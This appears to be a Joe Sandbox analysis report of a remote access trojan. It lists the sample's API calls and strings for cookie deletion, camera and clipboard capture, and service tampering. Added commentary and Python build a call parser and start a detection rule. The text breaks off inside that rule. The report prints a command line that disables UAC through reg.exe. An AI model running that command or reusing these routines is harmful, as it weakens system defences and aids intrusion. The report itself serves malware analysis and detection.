                                        • std::_Lockit::_Lockit.LIBCPMT ref: 0040FEDF
                                        • int.LIBCPMT ref: 0040FEF2
                                          • Part of subcall function 0040CEE0: std::_Lockit::_Lockit.LIBCPMT ref: 0040CEF1
                                          • Part of subcall function 0040CEE0: std::_Lockit::~_Lockit.LIBCPMT ref: 0040CF0B
                                        • std::_Facet_Register.LIBCPMT ref: 0040FF2E
                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 0040FF54
                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 0040FF70
                                        Similarity
                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                                        • String ID: h]G
                                        • API String ID: 2536120697-1579725984
                                        APIs
                                        • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Cookies), ref: 0040B2E4
                                        • GetLastError.KERNEL32 ref: 0040B2EE
                                        Strings
                                        • \AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 0040B2AF
                                        • [Chrome Cookies not found], xrefs: 0040B308
                                        • UserProfile, xrefs: 0040B2B4
                                        • [Chrome Cookies found, cleared!], xrefs: 0040B314
                                        Similarity
                                        • API ID: DeleteErrorFileLast
                                        • String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
                                        • API String ID: 2018770650-304995407
                                        Strings
                                        • BG, xrefs: 00406909
                                        • Rmc-IUHLZ9, xrefs: 0040693F
                                        • C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe, xrefs: 00406927
                                        Similarity
                                        • API ID:
                                        • String ID: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe$Rmc-IUHLZ9$BG
                                        • API String ID: 0-3797123947
                                        APIs
                                          • Part of subcall function 0041A696: GetLocalTime.KERNEL32(00000000), ref: 0041A6B0
                                        • GetModuleHandleA.KERNEL32(00000000,00020009), ref: 00419F74
                                        • PlaySoundW.WINMM(00000000,00000000), ref: 00419F82
                                        • Sleep.KERNEL32(00002710), ref: 00419F89
                                        • PlaySoundW.WINMM(00000000,00000000,00000000), ref: 00419F92
                                        Similarity
                                        • API ID: PlaySound$HandleLocalModuleSleepTime
                                        • String ID: Alarm triggered$`Wu
                                        • API String ID: 614609389-1738255680
                                        APIs
                                        • __allrem.LIBCMT ref: 00439799
                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004397B5
                                        • __allrem.LIBCMT ref: 004397CC
                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004397EA
                                        • __allrem.LIBCMT ref: 00439801
                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043981F
                                        Similarity
                                        • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                        • String ID:
                                        • API String ID: 1992179935-0
                                        Similarity
                                        • API ID: __cftoe
                                        • String ID:
                                        • API String ID: 4189289331-0
                                        APIs
                                        • Sleep.KERNEL32(00000000), ref: 00403E8A
                                          • Part of subcall function 00403FCD: __EH_prolog.LIBCMT ref: 00403FD2
                                        Similarity
                                        • API ID: H_prologSleep
                                        • String ID: CloseCamera$FreeFrame$GetFrame$OpenCamera$P>G
                                        • API String ID: 3469354165-462540288
                                        APIs
                                        • OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,?,00000000,?,?,00419517,00000000,00000000), ref: 00419E0C
                                        • OpenServiceW.ADVAPI32(00000000,00000000,00000002,?,00000000,?,?,00419517,00000000,00000000), ref: 00419E20
                                        • CloseServiceHandle.ADVAPI32(00000000,?,00000000,?,?,00419517,00000000,00000000), ref: 00419E2D
                                        • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,00419517), ref: 00419E62
                                        • CloseServiceHandle.ADVAPI32(00000000,?,00000000,?,?,00419517,00000000,00000000), ref: 00419E74
                                        • CloseServiceHandle.ADVAPI32(00000000,?,00000000,?,?,00419517,00000000,00000000), ref: 00419E77
                                        Similarity
                                        • API ID: Service$CloseHandle$Open$ChangeConfigManager
                                        • String ID:
                                        • API String ID: 493672254-0
                                        APIs
                                        • GetLastError.KERNEL32(?,?,00437E0D,004377C1), ref: 00437E24
                                        • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00437E32
                                        • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00437E4B
                                        • SetLastError.KERNEL32(00000000,?,00437E0D,004377C1), ref: 00437E9D
                                        Similarity
                                        • API ID: ErrorLastValue___vcrt_
                                        • String ID:
                                        • API String ID: 3852720340-0
                                        • Opcode ID: 621d246bd99772174e6328e27007d7fc44d2e9bedb07ae0db1c9b20682e519a8
                                        • Instruction ID: 127a8aaeb23cc4eddae083ca6fcd73be4c6f1963697d6e79a1959115bdf772ac
                                        • Opcode Fuzzy Hash: 621d246bd99772174e6328e27007d7fc44d2e9bedb07ae0db1c9b20682e519a8
                                        • Instruction Fuzzy Hash: 6701B57211D3159EE63427757C87A272B99EB0A779F20127FF228851E2EF2D4C41914C
                                        APIs
                                        • GetLastError.KERNEL32(?,?,0043932C,?,00000000,?,0043B965,00000000,00000000), ref: 00446ED3
                                        • _free.LIBCMT ref: 00446F06
                                        • _free.LIBCMT ref: 00446F2E
                                        • SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F3B
                                        • SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F47
                                        • _abort.LIBCMT ref: 00446F4D
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ErrorLast$_free$_abort
                                        • String ID:
                                        • API String ID: 3160817290-0
                                        • Opcode ID: c8da7f0c6bc53abe63124bd11b18efa7ba6299d8fddab580282761fd2749e6ad
                                        • Instruction ID: 1b4467ed9408e6c3233579f8e1b56ac98d0768551ab8ff32c5b7efb0424b8365
                                        • Opcode Fuzzy Hash: c8da7f0c6bc53abe63124bd11b18efa7ba6299d8fddab580282761fd2749e6ad
                                        • Instruction Fuzzy Hash: B1F0F93560870027F61273797D46A6F15669BC37B6B26013FF909A2292EE2D8C06411F
                                        APIs
                                        • OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,?,?,?,?,?,?,004197AB,00000000,00000000), ref: 00419C3F
                                        • OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,004197AB,00000000,00000000), ref: 00419C53
                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004197AB,00000000,00000000), ref: 00419C60
                                        • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,004197AB,00000000,00000000), ref: 00419C6F
                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004197AB,00000000,00000000), ref: 00419C81
                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004197AB,00000000,00000000), ref: 00419C84
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Service$CloseHandle$Open$ControlManager
                                        • String ID:
                                        • API String ID: 221034970-0
                                        • Opcode ID: e0442b8656df40b354effc29a53afdc585f42babe91f9aeac9dec78915b16ffb
                                        • Instruction ID: 508c6a04514e5737773cd2f196b8466aacbf0489f3ca208dfe1df169d6e4b917
                                        • Opcode Fuzzy Hash: e0442b8656df40b354effc29a53afdc585f42babe91f9aeac9dec78915b16ffb
                                        • Instruction Fuzzy Hash: 93F0F6325403147BD3116B25EC89EFF3BACDB85BA1F000036F941921D2DB68CD4685F5
                                        APIs
                                        • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,?,?,?,?,?,?,00419729,00000000,00000000), ref: 00419D41
                                        • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,00419729,00000000,00000000), ref: 00419D55
                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419729,00000000,00000000), ref: 00419D62
                                        • ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,00419729,00000000,00000000), ref: 00419D71
                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419729,00000000,00000000), ref: 00419D83
                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419729,00000000,00000000), ref: 00419D86
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Service$CloseHandle$Open$ControlManager
                                        • String ID:
                                        • API String ID: 221034970-0
                                        • Opcode ID: 197637b26bbdd00f03ff7db36be43807083bab4a770c68d4e23c4aa016e90e1f
                                        • Instruction ID: e3947c2d1caeee04707242a29777fdfa1156a9fa4bc9e6dc5536219c00a7af20
                                        • Opcode Fuzzy Hash: 197637b26bbdd00f03ff7db36be43807083bab4a770c68d4e23c4aa016e90e1f
                                        • Instruction Fuzzy Hash: 88F0C2325002146BD2116B25FC49EBF3AACDB85BA1B00003AFA06A21D2DB38CD4685F9
                                        APIs
                                        • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,?,?,?,?,?,?,004196A7,00000000,00000000), ref: 00419DA6
                                        • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,004196A7,00000000,00000000), ref: 00419DBA
                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004196A7,00000000,00000000), ref: 00419DC7
                                        • ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,004196A7,00000000,00000000), ref: 00419DD6
                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004196A7,00000000,00000000), ref: 00419DE8
                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004196A7,00000000,00000000), ref: 00419DEB
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Service$CloseHandle$Open$ControlManager
                                        • String ID:
                                        • API String ID: 221034970-0
                                        • Opcode ID: e355818817006b765bc9d302ee5cf97eebc986756fff16413e45bff3808d062c
                                        • Instruction ID: 9f0c2abda8e07195e4bf0f321f31a82c7612ecaf5c8047990b3e76cea93c5393
                                        • Opcode Fuzzy Hash: e355818817006b765bc9d302ee5cf97eebc986756fff16413e45bff3808d062c
                                        • Instruction Fuzzy Hash: FAF0C2325002146BD2116B24FC89EFF3AACDB85BA1B00003AFA05A21D2DB28CE4685F8
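The three functions above are the sample's service stop, pause and continue routines: each opens a service and calls ControlService with control code 1, 2 or 3. Reading the listed arguments, the OpenServiceW access mask tracks the control code (0x20, SERVICE_STOP, in the function that sends SERVICE_CONTROL_STOP; 0x40, SERVICE_PAUSE_CONTINUE, in the two that send PAUSE and CONTINUE), which is what a working service-tampering routine needs. The following Python is an added example, not part of the Joe Sandbox report or of the sample: it parses the bullet lines of an "APIs" listing in this report's format into structured calls and annotates the service-control calls with the winsvc.h constant names. The input is copied from the three listings above; the argument splitting assumes no commas inside a single argument, which holds for these lines.

```python
import re
from dataclasses import dataclass
from typing import List, Union

# The three service-control listings, copied verbatim from the "APIs" entries above.
# Values after the real parameters are stack contents (e.g. the return address
# 004197AB) that Joe Sandbox prints alongside the arguments.
REPORT_LINES = """
• OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,?,?,?,?,?,?,004197AB,00000000,00000000), ref: 00419C3F
• OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,004197AB,00000000,00000000), ref: 00419C53
• ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,004197AB,00000000,00000000), ref: 00419C6F
• OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,00419729,00000000,00000000), ref: 00419D55
• ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,00419729,00000000,00000000), ref: 00419D71
• OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,004196A7,00000000,00000000), ref: 00419DBA
• ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,004196A7,00000000,00000000), ref: 00419DD6
"""

# One bullet line: "• Func.MODULE(args), ref: ADDR" (the parenthesised args are optional,
# e.g. "GetLastError.KERNEL32 ref: 0041CAA1").
API_LINE = re.compile(
    r"^\s*•\s*(?P<func>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)

Arg = Union[int, str, None]  # int for hex words, None for "?", str for paths/strings


@dataclass
class ApiCall:
    func: str
    module: str
    args: List[Arg]
    ref: int  # address of the call site


def _parse_arg(token: str) -> Arg:
    token = token.strip()
    if token == "?":
        return None
    try:
        return int(token, 16)
    except ValueError:
        return token


def parse_api_lines(text: str) -> List[ApiCall]:
    """Parse the bullet lines of a Joe Sandbox 'APIs' listing into ApiCall records."""
    calls = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if not m:
            continue  # headers, 'Part of subcall function' lines, etc.
        raw = m.group("args") or ""
        args = [_parse_arg(t) for t in raw.split(",")] if raw else []
        calls.append(ApiCall(m.group("func"), m.group("module"), args, int(m.group("ref"), 16)))
    return calls


# Constants from winsvc.h (Windows SDK).
SERVICE_CONTROL = {1: "SERVICE_CONTROL_STOP", 2: "SERVICE_CONTROL_PAUSE",
                   3: "SERVICE_CONTROL_CONTINUE", 4: "SERVICE_CONTROL_INTERROGATE"}
SERVICE_ACCESS = {0x1: "SERVICE_QUERY_CONFIG", 0x2: "SERVICE_CHANGE_CONFIG",
                  0x4: "SERVICE_QUERY_STATUS", 0x8: "SERVICE_ENUMERATE_DEPENDENTS",
                  0x10: "SERVICE_START", 0x20: "SERVICE_STOP", 0x40: "SERVICE_PAUSE_CONTINUE",
                  0x80: "SERVICE_INTERROGATE", 0x100: "SERVICE_USER_DEFINED_CONTROL"}
# Access right ControlService requires on the service handle for each control code.
REQUIRED_ACCESS = {1: 0x20, 2: 0x40, 3: 0x40, 4: 0x80}


def decode_access(mask: int) -> List[str]:
    return [name for bit, name in sorted(SERVICE_ACCESS.items()) if mask & bit]


def summarize_service_controls(calls: List[ApiCall]) -> List[dict]:
    """Pair each ControlService with the preceding OpenServiceW and check the access mask."""
    out, last_open = [], None
    for c in calls:
        if c.func == "OpenServiceW" and len(c.args) >= 3:
            last_open = c
        elif c.func == "ControlService" and len(c.args) >= 2:
            code = c.args[1]
            access = last_open.args[2] if last_open and isinstance(last_open.args[2], int) else None
            out.append({
                "ref": f"{c.ref:08X}",
                "control": SERVICE_CONTROL.get(code, f"unknown({code})"),
                "open_access": decode_access(access) if access is not None else [],
                "access_sufficient": access is not None and bool(access & REQUIRED_ACCESS.get(code, 0)),
            })
    return out


if __name__ == "__main__":
    for entry in summarize_service_controls(parse_api_lines(REPORT_LINES)):
        print(entry)
```

Run against the listings above this yields three entries (STOP, PAUSE, CONTINUE), each with an access mask sufficient for its control code. The same parser can be pointed at any other "APIs" listing in the report, for instance to pull the CreateProcessA command line or the RegCreateKeyW root key out of the later functions.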
                                        APIs
                                        • RegQueryInfoKeyW.ADVAPI32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00412A1D
                                        • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?,?,00000000,?,?,?,?), ref: 00412A4C
                                        • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,?,?,00002710,?,?,?,00000000,?,?,?,?), ref: 00412AED
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Enum$InfoQueryValue
                                        • String ID: [regsplt]$DG
                                        • API String ID: 3554306468-1089238109
                                        • Opcode ID: bdfd4bea99a2a56e0bf69a035c0c9d08caa5f3d1df37628ba4533c7e0d6d2cae
                                        • Instruction ID: a28855c8467dc88eaaa14c2ad720c73ed52e1c745f0e0c0b8cf84a63aeea62c1
                                        • Opcode Fuzzy Hash: bdfd4bea99a2a56e0bf69a035c0c9d08caa5f3d1df37628ba4533c7e0d6d2cae
                                        • Instruction Fuzzy Hash: 99512E72108345AFD310EF61D995DEBB7ECEF84744F00493EB585D2191EB74EA088B6A
                                        APIs
                                        • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe,00000104), ref: 00442724
                                        • _free.LIBCMT ref: 004427EF
                                        • _free.LIBCMT ref: 004427F9
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: _free$FileModuleName
                                        • String ID: 8({$C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe
                                        • API String ID: 2506810119-299268273
                                        • Opcode ID: 517ef8501d39ed80bd5d3989cd54e6cd38b7eb486680de81052e85c6479d25b4
                                        • Instruction ID: a09326ba0634f9fc59332e3a0850bb80beab61cea56b0999b5ec2e0ea5ed553b
                                        • Opcode Fuzzy Hash: 517ef8501d39ed80bd5d3989cd54e6cd38b7eb486680de81052e85c6479d25b4
                                        • Instruction Fuzzy Hash: 04318075A00218AFEB21DF999D8199EBBFCEB85354B50406BF80497311D6B88E81CB59
                                        APIs
                                          • Part of subcall function 00433529: EnterCriticalSection.KERNEL32(00470D18,?,00475D4C,?,0040AE8B,00475D4C,?,00000000,00000000), ref: 00433534
                                          • Part of subcall function 00433529: LeaveCriticalSection.KERNEL32(00470D18,?,0040AE8B,00475D4C,?,00000000,00000000), ref: 00433571
                                          • Part of subcall function 004338B5: __onexit.LIBCMT ref: 004338BB
                                        • __Init_thread_footer.LIBCMT ref: 0040AEA7
                                          • Part of subcall function 004334DF: EnterCriticalSection.KERNEL32(00470D18,00475D4C,?,0040AEAC,00475D4C,00456DA7,?,00000000,00000000), ref: 004334E9
                                          • Part of subcall function 004334DF: LeaveCriticalSection.KERNEL32(00470D18,?,0040AEAC,00475D4C,00456DA7,?,00000000,00000000), ref: 0043351C
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CriticalSection$EnterLeave$Init_thread_footer__onexit
                                        • String ID: [End of clipboard]$[Text copied to clipboard]$L]G$P]G
                                        • API String ID: 2974294136-4018440003
                                        • Opcode ID: b82003dba18b260b6b367d1d56eee30e8a04c9e681fd49378d646ec93357fd77
                                        • Instruction ID: f936e1d100a0b91fb3cd099947d4fcefdabc4258effb679c9043d151633dcd27
                                        • Opcode Fuzzy Hash: b82003dba18b260b6b367d1d56eee30e8a04c9e681fd49378d646ec93357fd77
                                        • Instruction Fuzzy Hash: EF21B131A002158ACB14FB75D8969EE7374AF54318F50403FF902771E2EF386E5A8A8D
                                        APIs
                                        • RegisterClassExA.USER32(00000030), ref: 0041CA7C
                                        • CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041CA97
                                        • GetLastError.KERNEL32 ref: 0041CAA1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ClassCreateErrorLastRegisterWindow
                                        • String ID: 0$MsgWindowClass
                                        • API String ID: 2877667751-2410386613
                                        • Opcode ID: c0911dd88a02fcfaa539e9866612e91b1c0db8d522a7ddfb79423dd2815842ef
                                        • Instruction ID: 4bfad48e3247df46523b3088673b608286a28c5fe91561ad906263ccd1e0ab35
                                        • Opcode Fuzzy Hash: c0911dd88a02fcfaa539e9866612e91b1c0db8d522a7ddfb79423dd2815842ef
                                        • Instruction Fuzzy Hash: 7501E5B1D1421DAB8B01DFEADCC49EFBBBDBE49295B50452AE415B2200E7708A458BA4
                                        APIs
                                        • CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 00406A00
                                        • CloseHandle.KERNEL32(?), ref: 00406A0F
                                        • CloseHandle.KERNEL32(?), ref: 00406A14
                                        Strings
                                        • /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 004069F6
                                        • C:\Windows\System32\cmd.exe, xrefs: 004069FB
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CloseHandle$CreateProcess
                                        • String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe
                                        • API String ID: 2922976086-4183131282
                                        • Opcode ID: eb4121427644dbe92f0faf5bfcaaefbe4213ddeedd11a12955cf8af7f240737c
                                        • Instruction ID: df89934bb1b0a8a8050eda01f74e4a29103dee5852f25f58c468be6e25eb4aa4
                                        • Opcode Fuzzy Hash: eb4121427644dbe92f0faf5bfcaaefbe4213ddeedd11a12955cf8af7f240737c
                                        • Instruction Fuzzy Hash: 22F090B69402ADBACB30ABD69C0EFCF7F3CEBC5B10F00042AB605A6051D6705144CAB8
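The function above is the sample's UAC-disable routine: it launches cmd.exe /k with a reg.exe ADD command that sets HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA to 0, which turns off UAC system-wide after the next reboot (writing that key needs an elevated token, so the event is expected only after the sample has elevated). The Python below is an added detection example, not part of the report or of the sample: a process-creation rule run over a handful of constructed Sysmon-style events, the first of which reproduces the CreateProcessA command line shown above. The other events (a direct reg.exe invocation with an 0x0 data value, a PowerShell Set-ItemProperty variant, and two benign controls) are made up for the test; the PowerShell pattern assumes -Name precedes -Value on the command line.

```python
import re
from typing import Dict, List, Optional

# Constructed process-creation events (Sysmon Event ID 1 style, reduced to the
# fields the rule uses). Event 0 reproduces the CreateProcessA command line in
# this report; events 1-4 are variants and benign controls invented for the test.
SAMPLE_PATH = r"C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe"

EVENTS: List[Dict[str, str]] = [
    {"image": r"C:\Windows\System32\cmd.exe", "parent_image": SAMPLE_PATH,
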